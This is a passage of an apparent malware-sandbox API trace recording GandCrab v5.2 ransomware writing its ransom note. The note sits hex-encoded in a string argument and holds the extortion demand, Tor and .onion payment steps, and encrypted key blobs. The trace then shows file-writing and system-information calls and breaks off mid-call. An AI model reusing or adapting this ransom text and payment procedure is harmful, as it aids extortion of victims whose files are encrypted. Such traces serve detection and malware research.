(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.905] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0095.906] CloseHandle (hObject=0x2bc) returned 1 [0095.906] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.906] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.906] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0xdf)) [0095.906] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.907] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.907] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.907] wsprintfW (in: param_1=0x1e70000, 